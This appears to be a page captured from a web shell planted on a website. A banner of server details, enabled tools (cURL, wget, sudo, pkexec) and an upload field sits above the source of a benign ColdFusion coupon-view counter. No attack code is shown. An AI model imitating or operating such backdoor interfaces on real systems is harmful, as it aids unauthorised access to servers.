| Server IP : 172.67.201.108 / Your IP : 216.73.216.11 Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5 System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64 User : ec2-user ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/home2/domains/conciergechoiceawards.org/public_html/ |
Upload File : |
<cfif parameterexists(url.id) and isnumeric(url.id)> <cfset today=#DateFormat(now(),"yyyy-mm-dd")#> <cfquery name="getstats" datasource="#ds#"> select * from ListingsCouponStats where showdate = '#today#' and showid = #url.id# and mag = 1 </cfquery> <Cfif #getstats.recordcount# gt 0> <CFQUERY datasource="#ds#"> UPDATE ListingsCouponStats SET views = views + 1 WHERE ID = #getstats.id# </CFQUERY> <cfelse> <cfquery name=addphoto datasource="#ds#"> INSERT INTO ListingsCouponStats (showid,showdate,views,tablename,mag) VALUES (#url.id#,'#today#',1,'coupons',1) </cfquery> </CFIF> <cfquery name="getlistings" datasource="#ds#"> select linkfile from ListingsCoupons where id = #url.id# </cfquery> <cfif #right(getlistings.linkfile,3)# eq 'pdf'> <cflocation url="/listingscoupons/#getlistings.linkfile#" addtoken="no"> <cfelse> <cflocation url="/quickcoupon2.cfm?id=#url.id#" addtoken="no"> </cfif> </cfif>